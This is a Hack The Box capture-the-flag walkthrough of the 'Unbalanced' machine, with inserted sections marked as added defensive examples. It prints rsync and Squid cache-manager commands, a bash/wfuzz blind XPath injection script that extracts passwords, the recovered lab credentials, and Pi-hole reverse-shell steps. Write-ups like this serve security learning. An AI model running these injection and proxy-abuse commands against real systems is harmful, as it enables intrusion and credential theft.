Unbalanced — Hack the box Walkthrough

MachineX · Armour Infosec · Dec 5, 2020

Hello infosec community

Hope you are doing well in these tough pandemic times. This time I am presenting the walkthrough of my first Hard machine on Hack The Box, Unbalanced. It was a very interesting box; one must give it a shot. Okay, without any further ado, let's hack this box 😉

Methodology applied

  • scanning
  • enumerating rsync
  • worked on squid proxy
  • exploited the login page
  • got into a third box
  • privesc of main box

NOTE: The last two may sound confusing, as this is not generally the case, but trust me, this is the most interesting part of the walkthrough. Stay tuned.

Scanning

Used nmap to scan the ports, with the following options:
-sC : default scripts
-sV : enumerate versions
-v : verbose

┌─[root@parrot]─[~/mine/HTB/unbalanced]
└──╼ #nmap -sC -sV -v 10.10.10.200

We have SSH, rsync and a Squid proxy running here.

Enumeration

Let's first go for rsync.

Viewing the available shares on rsync:

┌─[✗]─[root@parrot]─[~/mine/HTB/unbalanced]
└──╼ #rsync rsync://10.10.10.200:873 -a --list-only
conf_backups EncFS-encrypted configuration backups

We have three shares here, of which we have access to conf_backups only, so we pull that directory:

┌─[root@parrot]─[~/mine/HTB/unbalanced]
└──╼ #mkdir rsync
┌─[root@parrot]─[~/mine/HTB/unbalanced]
└──╼ #rsync rsync://10.10.10.200:873/conf_backups -a rsync/
truncated output

We see that the files have names that look like arbitrary strings. But when we list all the files, there is one interesting file, as shown below.

After reading up on it, one thing is certain: this is an EncFS-encrypted file system, which needs to be decrypted in order to obtain the human-readable contents.
We use encfs2john, which extracts a hash from this volume that can then be cracked (the tool can be found at /usr/share/john/encfs2john.py).

┌─[root@parrot]─[~/mine/HTB/unbalanced]
└──╼ #python encfs2john.py rsync/ > enc.john
┌─[root@parrot]─[~/mine/HTB/unbalanced]
└──╼ #cat enc.john
rsync/:$encfs$192*580280*0*20*99176a6e4d96c0b32bad9d4feb3d8e425165f105*44*1b2a580dea6cda1aedd96d0b72f43de132b239f51c224852030dfe8892da2cad329edc006815a3e84b887add

We have the hash here. Let's crack it.

AND we have the password for the encrypted volume: bubblegum. Let's see what it has got for us.

┌─[✗]─[root@parrot]─[~/mine/HTB/unbalanced]
└──╼ #encfs --forcedecode /root/mine/HTB/unbalanced/rsync/ /root/mine/HTB/unbalanced/decrypted/
EncFS Password:

Here we have a bunch of configuration files, of which squid.conf is the one worth a look, as the same service is running on the target. After a little research on this part, I figured out that squidclient is the tool that shows us the way forward.

A little insight before working with this tool: this client lets us send queries to the cache manager of the Squid proxy. To make the queries you need the password, which is given in the config file; webmaster is the default cache manager present here. Also, in "mgr:COMMAND", COMMAND is one of the queries that the cache manager supports, and these can be found in the config file.

Highlighting the password in squid.conf:
┌─[root@parrot]─[~/mine/HTB/unbalanced]
└──╼ #squidclient -h 10.10.10.200 -p 3128 -w 'Thah$Sh1' mgr:fqdncache

We are basically querying the FQDN cache of this proxy server, and we see some interesting entries there.

Highlighted are the hosts which can be accessed only when we set 10.10.10.200:3128 as our proxy.
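The cache manager query above works because the manager interface is reachable through the proxy from any client and its password sat in a configuration backup that was readable over anonymous rsync. As an added example, not taken from the box's squid.conf or from the original post, here is a hypothetical Squid configuration fragment contrasting that exposure with the usual hardening. The directives are standard Squid ones; the password value is a placeholder, and the rule order matters because http_access rules are evaluated top to bottom.

```conf
# Weak (hypothetical): every client is allowed through before the manager
# rules are reached, and one password unlocks every cache manager action,
# so whoever recovers the password from a leaked squid.conf can query it.
http_access allow all
cachemgr_passwd <placeholder-password> all

# Hardened: manager requests are only accepted from the proxy host itself,
# denied for everyone else, and no password-gated manager action is exposed.
# These lines must appear before any general "http_access allow" rule.
http_access allow localhost manager
http_access deny manager
cachemgr_passwd disable all
```

With the hardened fragment in place, the squidclient query shown above is refused for any client other than localhost, and a leaked squid.conf no longer carries a usable cache manager password.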

So we update our /etc/hosts file accordingly, set the proxy, and when we hit those three domains we get the same login page.

NOTE: Now this is the most CTF-ish thing about the box; even I had to refer to the forum for this. The thing is, we see the IPs 172.31.179.2 and 172.31.179.3, so it can be concluded that 172.31.179.1 is missing.

After hitting that address in the browser, with 10.10.10.200:3128 as the proxy, we get the following:

And yes, our instinct was right: we see a message telling us that it's under maintenance, so it is most likely vulnerable, and this is our target. We get the same login page on http://172.31.179.1/intranet.php.

Now, after a lot of study, research, banging my head against the wall and going through forums, I came to know that it's vulnerable to something called XPath injection.
Here are some resources where you can make yourself aware of the topic:

First we use the most basic payload, which is ' or 'a'='a .
When we do this, we get a list of four users. Now let me give you a little insight into my exploit:

#!/bin/bash
# Boolean-based blind XPath injection: for each known user, test one
# character of Password at a time. wfuzz substitutes each candidate from
# the file "payload" for FUZZ, and --hh 6756 hides the "no match" responses
# (6756 characters), so only the correct character for each position is
# printed. The sed calls just trim wfuzz's banner and summary lines.
arr=("rita" "jim" "bryan" "sarah")
for j in "${arr[@]}"
do
  for i in {1..20}
  do
    echo "for $i character of password: "
    wfuzz -w payload -p 10.10.10.200:3128:HTTP -u http://172.31.179.1/intranet.php -d "Username=$j' and substring(Password,$i,1)='FUZZ' or '&Password=fuck" --hh 6756 | sed '2,13d' | sed '6,10d'
    echo "================================"
  done
done

A file named payload is used, whose contents are:
(the output of the script further below, plus some basic special characters like !@#$%^&*())

(one character per line) a–z, A–Z, 0–9, and the special characters ! @ # $ % ^ & * ( ) _

This payload file can be generated with the following script, appending the special characters afterwards:

#!/bin/bash
# Emit a-z, A-Z and 0-9 one per line, then the special characters;
# redirect the output to the file "payload" used by the exploit above.
for i in {{a..z},{A..Z},{0..9}}
do
  echo "$i"
done
printf '%s\n' '!' '@' '#' '$' '%' '^' '&' '*' '(' ')' '_'

Now the attack goes like this: since we know it is XPath, we can try some other enumeration, for example checking whether any users have "password" as their password.

'or substring(Password,1,1)='p' or'
'or substring(Password,2,1)='a' or'

The first returns all user accounts with p as the first letter of their password; the second returns all user accounts with a as the second letter of their password.
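The injection works because the login page splices the form fields straight into an XPath expression: a quote followed by or 'a'='a turns the predicate into a tautology, and substring() lets one character of the stored password be tested per request. As an added example (my code, not the box's intranet application or the original post), the following Python contrasts that injectable pattern with a hardened lookup: the username is allowlisted before use, no XPath is built from input at all, and passwords are stored as salted PBKDF2 hashes and compared in constant time, so even a successful injection elsewhere would not hand over plaintext. The accounts, salts and element names are constructed for the example.

```python
import hashlib
import hmac
import re
import xml.etree.ElementTree as ET

# Usernames are restricted to an allowlist of characters, so a quote
# (the first thing an XPath payload needs) is rejected before any lookup.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")
PBKDF2_ROUNDS = 100_000


def hash_password(password: str, salt: str) -> str:
    """Salted PBKDF2-SHA256; the store never holds a plaintext password."""
    return hashlib.pbkdf2_hmac(
        "sha256", password.encode(), salt.encode(), PBKDF2_ROUNDS
    ).hex()


def build_store(accounts: dict) -> ET.Element:
    """Build a constructed <users> document from {username: password}.
    Salts are derived from the name only to keep the example deterministic;
    a real deployment would draw them from os.urandom()."""
    root = ET.Element("users")
    for name, password in accounts.items():
        salt = f"constructed-salt-{name}"
        user = ET.SubElement(root, "user")
        ET.SubElement(user, "username").text = name
        ET.SubElement(user, "salt").text = salt
        ET.SubElement(user, "hash").text = hash_password(password, salt)
    return root


def vulnerable_query(username: str, password: str) -> str:
    """The injectable pattern behind the login page: form fields spliced
    straight into the XPath string. Shown only to contrast with login();
    it is never evaluated here."""
    return f"//user[username='{username}' and password='{password}']"


def login(store: ET.Element, username: str, password: str) -> bool:
    """Hardened lookup: no XPath is built from input at all. The user node is
    selected by comparing text in Python, and the password is checked against
    the stored hash with a constant-time comparison."""
    if not USERNAME_RE.fullmatch(username):
        return False
    for user in store.findall("user"):
        if user.findtext("username") == username:
            expected = user.findtext("hash")
            candidate = hash_password(password, user.findtext("salt"))
            return hmac.compare_digest(expected, candidate)
    return False


if __name__ == "__main__":
    # Constructed accounts; these are not the box's credentials.
    store = build_store({"alice": "correct horse", "bob": "battery staple"})
    print(vulnerable_query("' or 'a'='a", "x"))   # the tautology lands inside the query
    print(login(store, "alice", "correct horse"))  # True
    print(login(store, "' or 'a'='a", "x"))        # False: rejected by the allowlist
```

The allowlist is the cheap first line; the real fix is that login() never hands user input to an XPath engine, so there is no query to inject into, and the hashed store means the character-by-character extraction shown above would at worst recover a PBKDF2 digest rather than a password reusable for SSH.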

I modified the query string with "and", thus forming the exploit. After running the exploit, we get the following output:

rita: password01!
jim: stairwaytoheaven
bryan: ireallyl0vebubblegum!!! → valid creds for SSH
sarah: sarah4evah
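From the defender's side, a loop like the one above is loud: hundreds of POSTs to one login URL from a single client in well under a minute, with the responses split between exactly two sizes (the "no match" page that --hh 6756 hides and the "match" page). As an added example that is not part of the original writeup, this Python parses Squid's native access.log format and flags that pattern with a sliding-window count per client and URL, reporting the distinct response sizes alongside. The log lines, client addresses and response sizes are constructed for the example, not captured from the box.

```python
import re
from collections import defaultdict, deque

# Squid native access.log layout, one request per line:
# timestamp elapsed client code/status bytes method URL ident hierarchy/peer type
LINE_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+(?P<elapsed>\d+)\s+(?P<client>\S+)\s+(?P<result>\S+)\s+"
    r"(?P<bytes>\d+)\s+(?P<method>\S+)\s+(?P<url>\S+)\s+(?P<ident>\S+)\s+"
    r"(?P<hier>\S+)\s+(?P<type>\S+)$"
)


def parse_line(line: str):
    """Return a dict for a well-formed Squid log line, else None."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    rec = m.groupdict()
    rec["ts"] = float(rec["ts"])
    rec["bytes"] = int(rec["bytes"])
    return rec


def find_blind_bruteforce(lines, window=60.0, threshold=30):
    """Flag (client, url) pairs that send >= threshold POSTs inside any
    sliding window of `window` seconds. Returns {(client, url): (peak, sizes)}
    where peak is the largest count seen in one window and sizes is the sorted
    set of distinct response sizes; a blind boolean injection typically
    produces exactly two."""
    recent = defaultdict(deque)   # per key: timestamps inside the window
    sizes = defaultdict(set)
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        key = (rec["client"], rec["url"])
        q = recent[key]
        q.append(rec["ts"])
        while q and rec["ts"] - q[0] > window:
            q.popleft()
        sizes[key].add(rec["bytes"])
        if len(q) >= threshold:
            flagged[key] = max(flagged.get(key, 0), len(q))
    return {k: (n, sorted(sizes[k])) for k, n in flagged.items()}


def constructed_log():
    """Constructed sample log. 10.10.14.5 is a made-up client submitting the
    login form twice a second; its responses alternate between the 'no match'
    size and the 'match' size. 10.10.14.9 is a benign browser doing GETs."""
    base = 1607160000.0
    lines = []
    for i in range(60):
        size = 7012 if i % 9 == 0 else 6756
        lines.append(
            f"{base + i * 0.5:.3f}     45 10.10.14.5 TCP_MISS/200 {size} POST "
            f"http://172.31.179.1/intranet.php - HIER_DIRECT/172.31.179.1 text/html"
        )
    for i in range(5):
        lines.append(
            f"{base + i * 10:.3f}    120 10.10.14.9 TCP_MISS/200 6756 GET "
            f"http://172.31.179.1/intranet.php - HIER_DIRECT/172.31.179.1 text/html"
        )
    return lines


if __name__ == "__main__":
    for (client, url), (peak, distinct) in find_blind_bruteforce(constructed_log()).items():
        print(f"{client} -> {url}: {peak} POSTs in window, response sizes {distinct}")
```

The threshold and window are deliberately loose; a real login page sees far fewer than thirty POSTs a minute from one address, and the two-size signature is what separates a blind injection loop from a plain credential-stuffing run, which tends to produce one size for every failure.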

So we SSH in as bryan with the password ireallyl0vebubblegum!!!

To check the connected devices, I used the following command:

bryan@unbalanced:~$ ip n
10.10.10.2 dev ens160 lladdr 00:50:56:b9:6d:8f REACHABLE
172.31.11.3 dev br-742fc4eb92b1 lladdr 02:42:ac:1f:0b:03 STALE
fe80::250:56ff:feb9:6d8f dev ens160 lladdr 00:50:56:b9:6d:8f router STALE

The above could also be seen on careful observation of the output of linpeas.sh.

We find another host (172.31.11.3) connected to it. Opening it in the browser with the proxy set, we get this Pi-hole login page:

I tried the random password 'admin' and it worked. We also see at the bottom that it's running version 4.3.2. Looking for an exploit for this version, this article turned out to be quite useful.
Now you can follow this article and get root on the box.

Following are the screenshots of how to compromise the Pi-hole server
(in the article they first show how to get a low-privileged shell, but here I am going directly for the root shell):

1. Editing Settings → Blocklist

2. Setting up the listener

3. After you do the above, get back to the browser and click "Update", with the listener on again on the same port 80

4. Now send your reverse shell payload to the listener

5. Getting the root shell of the Pi-hole server

Now that we have root on Pi-hole, let's enumerate to see where it takes us (pardon me, I was too lazy to upgrade it to a proper TTY shell).
In root's home directory we see these two files, and on opening pihole_config.sh we see a password.

root@pihole:~# ls 
ls
ph_install.sh
pihole_config.sh
root@pihole:~# cat pihole_config.sh

Let's try to SSH into unbalanced as root with this password. You will see that we cannot SSH directly as root, so we first log in as bryan and then switch to root.

And boom!!! We have just owned the machine!
Now, while doing this box I had a lot of help from the Hack The Box forum, as I am still a noob and learning things. This was my first writeup of a Hack The Box machine; I hope you guys learned something from it. And if you find anything wrong or inappropriate, constructive criticism is always welcome!!

HAPPY HACKING, fellas!!!
